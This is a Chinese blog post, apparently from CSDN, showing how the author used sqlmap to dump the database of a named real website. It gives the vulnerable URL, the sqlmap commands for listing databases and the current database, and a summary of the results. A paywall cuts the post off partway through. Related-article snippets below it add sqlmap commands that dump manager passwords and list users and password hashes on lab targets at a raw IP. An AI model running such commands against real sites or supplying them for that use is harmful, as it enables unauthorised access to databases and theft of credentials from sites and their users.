sqlmap的应用实战

最新推荐文章于 2025-06-04 15:36:56 发布

原创

最新推荐文章于 2025-06-04 15:36:56 发布 · 7.3k 阅读

43 ·

CC 4.0 BY-SA版权

文章标签：

#sqlmap

今天有幸在kali中文网上查看了很多大神写的sqlmap的教程，其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结，给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤，啊，不，是拖库。。。。。

1.首先要知道可以注入的网址是什么

http：//www.bible-history.com/subcat.php?id=2

2.接着就可以针对这个网址来检测能不能注入，以及查看它的所有数据库列表了

sqlmap -u "http：//www.bible-history.com/subcat.php?id=2" --dbs (注意：dbs前面是两个横杠)

注入的结果表示：

（1）注入参数id为GET注入，注入类型有四种，分别是：boolean-based blind/error-based/time-based blind/union query

（2）web应用程序技术为：Apache PHP

（3）数据库类型：MySQL

（4）画红圈的是网址所有的数据库名单

其中可能有你输入[Y/N]的，统统回车解决吧。

3.这时，我们发现这个网址存在注入，并且拿到了所有数据库名单。我们决定查看web当前使用的数据库

sqlmap -u "http：//www.bible-history.com/subcat.php?id=2" --current-db

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

vala爱吃鱼

关注关注

10
点赞
踩
43

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【网络安全】sqlmap实战

你在看屏幕的同时，屏幕也在注视着你

04-09

1516

sqlmap实战一、sqlmap配置（1）python27安装（2）sqlmap安装（3）配置环境变量（4）验证是否配置完成二、sqlmap语法（1）常用语法及其说明（2）sqlmap的使用说明三、sqlmap实战实战操作四、总结一、sqlmap配置（1）python27安装 python2.7 下载地址这里可以任意选择一个2.7的版本进行下载. 安装的时候最好自己新建一个python文件夹安装（我这里安装路径为D:\python\python2.7）（2）sqlmap安装 1.sqlmap的下

sqlmap实战，攻击学校学院网站（靶机）

Marsper的博客

09-10

1965

sqlmap实战，获取学院网站（靶机）管理员密码首先获取学院网址，寻找注入点，利用上节学到的sqlmap使用方法然后直接放进sqlmap里运行，输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 如下图接着找出所有数据库，输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs 运行结果如下接着选择rjxy数

参与评论您还未登录，请先登录后发表或查看评论

SQL 注入之 sqlmap 实战

2301_77160226的博客

08-29

1792

sqlmap 是一款自动化的 SQL 注入工具，它可以检测、利用和接管数据库服务器。它支持多种数据库管理系统，包括 MySQL、Oracle、PostgreSQL、Microsoft SQL Server 等。自动化检测：能够自动检测目标网站是否存在 SQL 注入漏洞。多种攻击方式：支持基于错误、布尔盲注、时间盲注等多种 SQL 注入攻击方式。数据库枚举：可以枚举数据库的名称、表名、列名和数据。权限提升：尝试提升数据库用户的权限，以获取更高的访问权限。

Sqlmap实战

ChuMeng1999的博客

01-18

734

1.（单选）有关sqlmap常用选项下列说法正确的是？ A：#sqlmap选项-p用于指定参数 B：#使用sqlmap选项-f可以判别数据库类型 C：#使用sqlmap选项–proxy可以设置代理 D：#以上都正确 2.（单选）Sqlmap是哪种语言开发的程序？ A：C B：C++ C：Python D：Golang 3.（单选）Sqlmap需要在哪种语言环境下运行？ A：Java B：Python C：PHP D：JSP ...

渗透测试---手把手教你sqlmap数据库注入测试---靶场实战教程建议收藏！

最新发布

wholeliubei的博客

06-04

647

SQLMap，就像它的名字所暗示的，是一个为我们提供方便的“SQL注入攻击”的工具。对于那些不熟悉这个概念的人来说，SQL注入是一种黑客攻击技术，允许攻击者在目标网站的数据库中执行恶意SQL语句。这意味着我们可以控制和操纵网站的数据，甚至可以完全接管整个网站。那么SQLMap如何帮助我们实现这些呢？首先，SQLMap可以帮助发现存在SQL注入漏洞的网站。它会进行自动化的扫描和检测，找出可能的注入点。

sqlmap实战

jihaichen的博客

05-06

567

1、实战mssql 判断注入类型 python sqlmap.py -u 注入点判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 p...

SQLMAP使用实战测试

06-12

### SQLMap使用实战测试知识点详解 #### 一、SQLMap简介 SQLMap是一款开源的渗透测试工具，专门用于检测和利用Web应用程序中的SQL注入漏洞。它可以帮助安全研究人员和渗透测试人员自动化地发现并利用这些漏洞，进而...

「SQLMap」SQLMap DVWA实战

Black coder

10-26

737

SQLMap 注入 DVWA实战

sqlmap实战指南：从基础到高级应用

在网络安全领域，SQL注入是一种常见的攻击手段，它利用了应用程序对用户输入数据的不当处理，允许攻击者执行恶意SQL语句。sqlmap是一款自动化工具，专门用于检测和利用SQL注入漏洞。以下将详细介绍sqlmap的几个关键...

SQLmap实战

unsurpassed的博客

03-13

776

sqlmap实战（靶机）

sweetie 的博客

09-10

1240

sqlmap攻击学校靶机进入学校网页主页随机点击使用命令>python2 sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3094” --dump -D rjxy -T manager -C “password,username” 遇到选择 do you want to crack them via a dictionary-based attack? [Y/n/q] Y do you want to use

sqlmap实战（攻击靶机）

weixin_50644630的博客

09-12

1032

sqlmap实战(攻击学校靶机) 进入学校靶机找到注入点，并放入sqlmap中测试是否可以注入查看数据库 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" --dbs 查询数据库 “rjxy” 的数据表 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" -D rjxy --tables 查询manager数据表的字段

sqlmap靶机实战

qq_46485934的博客

09-10

469

一.寻找目标网站的注入点（靶机实战）寻找注入点，随机点击一篇文章 url :http://117.167.136.244:28026/index/narticle.php?nid=3099 sql注入测试：http://117.167.136.244:28026/index/narticle.php?nid=3099’ 确定存在注入二.使用sqlmap sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs

Sqlmap的使用实例

lsyhaoshuai的博客

05-14

593

Sqlmap的使用实例 Sqlmap是渗透中一种常见的注入工具，之前的sqlmap只支持python2.6和python2.7，傻傻的我看博客的时候竟然不知道看日期，现在都2020年了，如今sqlmap也支持python3.0了。俗话说工欲善其事必先利其器，欲练习sqlmap的注入学习必须先把工具准备齐全，这一版首先分享一下环境的布置，以及自己踩过的坑。准备工具如下： 1.python3.7 可以从官网下载 https://www.python.org/downloads/ python的安装步骤可以自行

转载：sqlmap的应用实战

sinolzeng的专栏

02-13

414

原文链接：https://blog.youkuaiyun.com/vala0901/article/details/71548954 有幸在kali中文网上查看了很多大神写的sqlmap的教程，其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结，给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤，啊，不，是拖库。。。。。 1.首先要知道可以注入的网址是什么 http：//www.bible-history.com/subcat.php?id=..

sqlmap的使用与实例

诚邀网络通信领域商务合作

05-13

2317

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录一、sqlmap简介二、使用步骤1.注入2.用户权限一、sqlmap简介 Sqlmap是开源的自动化SQL注入工具，由Python写成。 sqlmap支持五种不同的注入模式： 1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。 3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在

sqlmap实战oracle,网络攻防实战-sqlmap从入门到精通

weixin_39950083的博客

04-14

657

网络攻防实战-sqlmap从入门到精通第1章sqlmap安装及搭建测试平台1.1在windows上安装sqlmap1.2在centos上安装sqlmap1.3在kali虚拟机中安装及使用sqlmap1.4在kali上搭建dvwa测试平台1.5在windows上搭建sqlab测试平台第2章sqlmap基础及使用2.1配置sqlmap2.2sqlmap目录及结构2.3SQLMap使用攻略及技巧-已经完...

Sqlmap高级技巧解析与实战应用

在网络安全领域，SQL注入是一种常见的攻击手段，而sqlmap是一款强大的自动化SQL注入工具，用于检测和利用网站应用程序中的SQL注入漏洞。以下是一些从标题和描述中提炼出的sqlmap高级技巧： 1. **绕过WAF和防御机制*...